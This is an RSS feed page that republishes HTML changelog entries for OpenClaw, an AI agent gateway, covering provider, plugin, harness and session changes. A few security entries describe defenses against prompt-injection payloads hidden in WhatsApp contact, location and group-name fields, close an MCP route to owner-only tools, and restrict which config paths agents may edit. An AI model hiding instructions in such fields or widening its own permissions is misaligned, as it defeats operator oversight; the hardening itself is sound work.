<li>MCP/tools: stop the ACPX OpenClaw tools bridge from listing or invoking owner-only tools such as <code>cron</code>, closing a privilege-escalation path for non-owner MCP callers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317612919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70698" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70698/hovercard" href="https://github.com/openclaw/openclaw/pull/70698">#70698</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Feishu/onboarding: load Feishu setup surfaces through a setup-only barrel so first-run setup no longer imports Feishu's Lark SDK before bundled runtime deps are staged. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311786128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70339" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70339/hovercard" href="https://github.com/openclaw/openclaw/pull/70339">#70339</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andrejtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andrejtr">@andrejtr</a>.</li>
<li>Approvals/startup: let native approval handlers report ready after gateway authentication while replaying pending approvals in the background, so slow or failing replay delivery no longer blocks handler startup or amplifies reconnect storms.</li>
<li>WhatsApp/security: keep contact/vCard/location structured-object free text out of the inline message body and render it through fenced untrusted metadata JSON, limiting hidden prompt-injection payloads in names, phone fields, and location labels/comments.</li>
<li>Group-chat/security: keep channel-sourced group names and participant labels out of inline group system prompts and render them through fenced untrusted metadata JSON.</li>
<li>Agents/replay: preserve Kimi-style <code>functions.&lt;name&gt;:&lt;index&gt;</code> tool-call IDs during strict replay sanitization so custom OpenAI-compatible Kimi routes keep multi-turn tool use intact. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317536165" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70693" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70693/hovercard" href="https://github.com/openclaw/openclaw/pull/70693">#70693</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/geri4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/geri4">@geri4</a>.</li>
<li>Discord/replies: preserve final reply permission context through outbound delivery so Discord replies keep the same channel/member routing rules at send time.</li>
<li>Plugins/startup: restore bundled plugin <code>openclaw/plugin-sdk/*</code> resolution from packaged installs and external runtime-deps stage roots, so Telegram/Discord no longer crash-loop with <code>Cannot find package 'openclaw'</code> after missing dependency repair. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319745436" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70852" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70852/hovercard" href="https://github.com/openclaw/openclaw/pull/70852">#70852</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simonemacario/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simonemacario">@simonemacario</a>.</li>
<li>CLI/Claude: run the same prompt-build hooks and trigger/channel context on <code>claude-cli</code> turns as on direct embedded runs, keeping Claude Code sessions aligned with OpenClaw workspace identity, routing, and hook-driven prompt mutations. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316475365" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70625" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70625/hovercard" href="https://github.com/openclaw/openclaw/pull/70625">#70625</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Discord/plugin startup: keep subagent hooks lazy behind Discord's channel entry so packaged entry imports stay narrow and report import failures with the channel id and entry path.</li>
<li>Memory/doctor: keep root durable memory canonicalized on <code>MEMORY.md</code>, stop treating lowercase <code>memory.md</code> as a runtime fallback, and let <code>openclaw doctor --fix</code> merge true split-brain root files into <code>MEMORY.md</code> with a backup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316390163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70621" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70621/hovercard" href="https://github.com/openclaw/openclaw/pull/70621">#70621</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Providers/Anthropic Vertex: restore ADC-backed model discovery after the lightweight provider-discovery path by resolving emitted discovery entries, exposing synthetic auth on bootstrap discovery, and honoring copied env snapshots when probing the default GCP ADC path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251357682" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65715" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65715/hovercard" href="https://github.com/openclaw/openclaw/issues/65715">#65715</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251358554" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65716" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65716/hovercard" href="https://github.com/openclaw/openclaw/pull/65716">#65716</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/feiskyer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/feiskyer">@feiskyer</a>.</li>
<li>Codex harness/status: pin embedded harness selection per session, show active non-PI harness ids such as <code>codex</code> in <code>/status</code>, and keep legacy transcripts on PI until <code>/new</code> or <code>/reset</code> so config changes cannot hot-switch existing sessions.</li>
<li>Gateway/security: fail closed on agent-driven <code>gateway config.apply</code>/<code>config.patch</code> runtime edits by allowlisting a narrow set of agent-tunable prompt, model, and mention-gating paths (including Telegram topic-level <code>requireMention</code>) instead of relying on a hand-maintained denylist of protected subtrees that could miss new sensitive config keys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317956002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70726" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70726/hovercard" href="https://github.com/openclaw/openclaw/pull/70726">#70726</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Webhooks/security: re-resolve <code>SecretRef</code>-backed webhook route secrets on each request so <code>openclaw secrets reload</code> revokes the previous secret immediately instead of waiting for a gateway restart. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317967302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70727" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70727/hovercard" href="https://github.com/openclaw/openclaw/pull/70727">#70727</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Memory/dreaming: decouple the managed dreaming cron from heartbeat by running it as an isolated lightweight agent turn, so dreaming runs even when heartbeat is disabled for the default agent and is no longer skipped by <code>heartbeat.activeHours</code>. <code>openclaw doctor --fix</code> migrates stale main-session dreaming jobs in persisted cron configs to the new shape. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304626834" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69811" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69811/hovercard" href="https://github.com/openclaw/openclaw/issues/69811">#69811</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4271783037" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67397" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67397/hovercard" href="https://github.com/openclaw/openclaw/issues/67397">#67397</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291011689" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68972" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68972/hovercard" href="https://github.com/openclaw/openclaw/issues/68972">#68972</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318151876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70737" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70737/hovercard" href="https://github.com/openclaw/openclaw/pull/70737">#70737</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>Agents/CLI: keep <code>--agent</code> plus <code>--session-id</code> lookup scoped to the requested agent store, so explicit agent resumes cannot select another agent's session. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321202277" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70985" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70985/hovercard" href="https://github.com/openclaw/openclaw/pull/70985">#70985</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankekn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankekn">@frankekn</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.22]]></title>
<description><![CDATA[2026.4.22
Changes

Providers/xAI: add image generation, text-to-speech, and speech-to-text support, including grok-imagine-image / grok-imagine-image-pro, reference-image edits, six live xAI voices, MP3/WAV/PCM/G.711 TTS formats, grok-stt audio transcription, and xAI realtime transcription for Vo...]]></description>
<link>https://tsecurity.de/de/3460960/downloads/openclaw-2026422/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3460960/downloads/openclaw-2026422/</guid>
<pubDate>Fri, 24 Apr 2026 12:30:45 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.22</h2>
<h3>Changes</h3>
<ul>
<li>Providers/xAI: add image generation, text-to-speech, and speech-to-text support, including <code>grok-imagine-image</code> / <code>grok-imagine-image-pro</code>, reference-image edits, six live xAI voices, MP3/WAV/PCM/G.711 TTS formats, <code>grok-stt</code> audio transcription, and xAI realtime transcription for Voice Call streaming. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289167319" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68694" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68694/hovercard" href="https://github.com/openclaw/openclaw/pull/68694">#68694</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KateWilkins/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KateWilkins">@KateWilkins</a>.</li>
<li>Providers/STT: add Voice Call streaming transcription for Deepgram, ElevenLabs, and Mistral, alongside the existing OpenAI and xAI realtime STT paths; ElevenLabs also gains Scribe v2 batch audio transcription for inbound media.</li>
<li>TUI: add local embedded mode for running terminal chats without a Gateway while keeping plugin approval gates enforced. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264316435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66767" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66767/hovercard" href="https://github.com/openclaw/openclaw/pull/66767">#66767</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>Onboarding: auto-install missing provider and channel plugins during setup so first-run configuration can complete without manual plugin recovery.</li>
<li>OpenAI/Responses: use OpenAI's native <code>web_search</code> tool automatically for direct OpenAI Responses models when web search is enabled and no managed search provider is pinned; explicit providers such as Brave keep the managed <code>web_search</code> tool.</li>
<li>Models/commands: add <code>/models add &lt;provider&gt; &lt;modelId&gt;</code> so you can register a model from chat and use it without restarting the gateway; keep <code>/models</code> as a simple provider browser while adding clearer add guidance and copy-friendly command examples. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4309680250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70211" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70211/hovercard" href="https://github.com/openclaw/openclaw/pull/70211">#70211</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>WhatsApp: add configurable native reply quoting with replyToMode for WhatsApp conversations. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mcaxtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mcaxtr">@mcaxtr</a>.</li>
<li>WhatsApp/groups+direct: forward per-group and per-direct <code>systemPrompt</code> config into inbound context <code>GroupSystemPrompt</code> so configured per-chat behavioral instructions are injected on every turn. Supports <code>"*"</code> wildcard fallback and account-scoped overrides under <code>channels.whatsapp.accounts.&lt;id&gt;.{groups,direct}</code>; account maps fully replace root maps (no deep merge), matching the existing <code>requireMention</code> pattern. Closes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3884775935" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/7011" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/7011/hovercard" href="https://github.com/openclaw/openclaw/issues/7011">#7011</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4192791373" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59553" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59553/hovercard" href="https://github.com/openclaw/openclaw/pull/59553">#59553</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bluetegu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bluetegu">@Bluetegu</a>.</li>
<li>Agents/sessions: add mailbox-style <code>sessions_list</code> filters for label, agent, and search plus visibility-scoped derived title and last-message previews. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4305333786" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69839" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69839/hovercard" href="https://github.com/openclaw/openclaw/pull/69839">#69839</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dangoZhang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dangoZhang">@dangoZhang</a>.</li>
<li>Control UI/settings+chat: add a browser-local personal identity for the operator (name plus local-safe avatar), route user identity rendering through the shared chat/avatar path used by assistant and agent surfaces, and tighten Quick Settings, agent fallback chips, and narrow-screen chat layouts so personalization no longer wastes space or clips controls. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312130618" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70362" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70362/hovercard" href="https://github.com/openclaw/openclaw/pull/70362">#70362</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Gateway/diagnostics: enable payload-free stability recording by default and add a support-ready diagnostics export with sanitized logs, status, health, config, and stability snapshots for bug reports. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311474600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70324" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70324/hovercard" href="https://github.com/openclaw/openclaw/pull/70324">#70324</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumadeiras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumadeiras">@gumadeiras</a>.</li>
<li>Providers/Tencent: add the bundled Tencent Cloud provider plugin with TokenHub onboarding, docs, <code>hy3-preview</code> model catalog entries, and tiered Hy3 pricing metadata. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287243375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68460" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68460/hovercard" href="https://github.com/openclaw/openclaw/pull/68460">#68460</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JuniperSling/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JuniperSling">@JuniperSling</a>.</li>
<li>Providers/Amazon Bedrock Mantle: add Claude Opus 4.7 through Mantle's Anthropic Messages route with provider-owned bearer-auth streaming, so the model is actually callable without treating AWS bearer tokens like Anthropic API keys. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wirjo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wirjo">@wirjo</a>.</li>
<li>Providers/GPT-5: move the GPT-5 prompt overlay into the shared provider runtime so compatible GPT-5 models receive the same behavior and heartbeat guidance through OpenAI, OpenRouter, OpenCode, Codex, and other GPT providers; add <code>agents.defaults.promptOverlays.gpt5.personality</code> as the global friendly-style toggle while keeping the OpenAI plugin setting as a fallback.</li>
<li>Providers/OpenAI Codex: remove the Codex CLI auth import path from onboarding and provider discovery so OpenClaw no longer copies <code>~/.codex</code> OAuth material into agent auth stores; use browser login or device pairing instead. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312396651" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70390" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70390/hovercard" href="https://github.com/openclaw/openclaw/pull/70390">#70390</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>CLI/Claude: default <code>claude-cli</code> runs to warm stdio sessions, including custom configs that omit transport fields, and resume from the stored Claude session after Gateway restarts or idle exits. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4301992987" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69679" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69679/hovercard" href="https://github.com/openclaw/openclaw/pull/69679">#69679</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Pi/models: update the bundled pi packages to <code>0.68.1</code> and let the OpenCode Go catalog come from pi instead of plugin-maintained model aliases, adding the refreshed <code>opencode-go/kimi-k2.6</code>, Qwen, GLM, MiMo, and MiniMax entries.</li>
<li>Tokenjuice: add bundled native OpenClaw support for tokenjuice as an opt-in plugin that compacts noisy <code>exec</code> and <code>bash</code> tool results in Pi embedded runs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306350228" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69946" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69946/hovercard" href="https://github.com/openclaw/openclaw/pull/69946">#69946</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>ACPX: add an explicit <code>openClawToolsMcpBridge</code> option that injects a core OpenClaw MCP server for selected built-in tools, starting with <code>cron</code>.</li>
<li>CLI/doctor plugins: lazy-load doctor plugin paths and prefer installed plugin <code>dist/*</code> runtime entries over source-adjacent JavaScript fallbacks, reducing the measured <code>doctor --non-interactive</code> runtime by about 74% while keeping cold doctor startup on built plugin artifacts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4305350443" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69840" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69840/hovercard" href="https://github.com/openclaw/openclaw/pull/69840">#69840</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumadeiras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumadeiras">@gumadeiras</a>.</li>
<li>CLI/debugging: add an opt-in temporary debug timing helper for local CLI performance investigations, with readable stderr output, JSONL capture, and docs for removing probes before landing fixes. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313389740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70469" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70469/hovercard" href="https://github.com/openclaw/openclaw/pull/70469">#70469</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Docs/i18n: add Thai translation support for the docs site.</li>
<li>Providers/OpenAI-compatible: mark known local backends such as vLLM, SGLang, llama.cpp, LM Studio, LocalAI, Jan, TabbyAPI, and text-generation-webui as streaming-usage compatible, so their token accounting no longer degrades to unknown/stale totals. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289344566" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68711" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68711/hovercard" href="https://github.com/openclaw/openclaw/pull/68711">#68711</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gaineyllc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gaineyllc">@gaineyllc</a>.</li>
<li>Providers/OpenAI-compatible: recover streamed token usage from llama.cpp-style <code>timings.prompt_n</code> / <code>timings.predicted_n</code> metadata and sanitize usage counts before accumulation, fixing unknown or stale totals when compatible servers do not emit an OpenAI-shaped <code>usage</code> object. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4045624176" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41056" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/41056/hovercard" href="https://github.com/openclaw/openclaw/pull/41056">#41056</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xaeon2026/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xaeon2026">@xaeon2026</a>.</li>
<li>Plugins/startup: prefer native Jiti loading for built bundled plugin dist modules on supported runtimes, cutting measured bundled plugin load time by 82-90% while keeping source TypeScript on the transform path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306218718" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69925" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69925/hovercard" href="https://github.com/openclaw/openclaw/pull/69925">#69925</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aauren/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aauren">@aauren</a>.</li>
<li>Plugin SDK/STT: share realtime transcription WebSocket transport and multipart batch transcription form helpers across bundled STT providers, reducing provider plugin boilerplate while preserving proxy capture, reconnects, audio queueing, close flushing, upload filename normalization, and ready handshakes.</li>
<li>Plugin SDK/Pi embedded runs: add a bundled-plugin embedded extension factory seam so native plugins can extend Pi embedded runs with async runtime hooks such as <code>tool_result</code> handling instead of falling back to the older synchronous persistence path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306350228" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69946" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69946/hovercard" href="https://github.com/openclaw/openclaw/pull/69946">#69946</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex harness/hooks: route native Codex app-server turns through <code>before_prompt_build</code> and emit <code>before_compaction</code> / <code>after_compaction</code> for native compaction items so prompt and compaction hooks stop drifting from Pi. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex harness/plugins: add a bundled-plugin Codex app-server extension seam for async <code>tool_result</code> middleware, fire <code>after_tool_call</code> for Codex tool runs, and route mirrored Codex transcript writes through <code>before_message_write</code> so tool integrations stop diverging from Pi. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex harness/hooks: fire <code>llm_input</code>, <code>llm_output</code>, and <code>agent_end</code> for native Codex app-server turns so lifecycle hooks stop drifting from Pi. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QA/Telegram: record per-scenario reply RTT in the live Telegram QA report and summary, starting with the canary response. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314668240" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70550" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70550/hovercard" href="https://github.com/openclaw/openclaw/pull/70550">#70550</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Status: add an explicit <code>Runner:</code> field to <code>/status</code> so sessions now report whether they are running on embedded Pi, a CLI-backed provider, or an ACP harness agent/backend such as <code>codex (acp/acpx)</code> or <code>gemini (acp/acpx)</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4315816501" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70595" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70595/hovercard" href="https://github.com/openclaw/openclaw/pull/70595">#70595</a>)</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Thinking defaults/status: raise the implicit default thinking level for reasoning-capable models from legacy <code>off</code>/<code>low</code> fallback behavior to a safe provider-supported <code>medium</code> equivalent when no explicit config default is set, preserve configured-model reasoning metadata when runtime catalog loading is empty, and make <code>/status</code> report the same resolved default as runtime.</li>
<li>Gateway/model pricing: fetch OpenRouter and LiteLLM pricing asynchronously at startup and extend catalog fetch timeouts to 30 seconds, reducing noisy timeout warnings during slow upstream responses.</li>
<li>Agents/sessions: keep daily reset and idle-maintenance bookkeeping from bumping session activity or pruning freshly active routes, so active conversations no longer look newer or disappear for maintenance-only updates.</li>
<li>Plugins/install: add newly installed plugin ids to an existing <code>plugins.allow</code> list before enabling them, so allowlisted configs load installed plugins after restart.</li>
<li>Status: show <code>Fast</code> in <code>/status</code> when fast mode is enabled, including config/default-derived fast mode, and omit it when disabled.</li>
<li>OpenAI/image generation: detect Azure OpenAI-style image endpoints, use Azure <code>api-key</code> auth plus deployment-scoped image URLs, honor <code>AZURE_OPENAI_API_VERSION</code>, and document the Azure setup path so image generation and edits work against Azure-hosted OpenAI resources. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4315378472" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70570" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70570/hovercard" href="https://github.com/openclaw/openclaw/pull/70570">#70570</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhanggpcsu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhanggpcsu">@zhanggpcsu</a>.</li>
<li>Telegram/forum topics: cache recovered forum metadata with bounded expiry so supergroup updates no longer need repeated <code>getChat</code> lookups before topic routing.</li>
<li>Onboarding/WeCom: show the official WeCom channel plugin with its native Enterprise WeChat display name and blurb in the external channel catalog.</li>
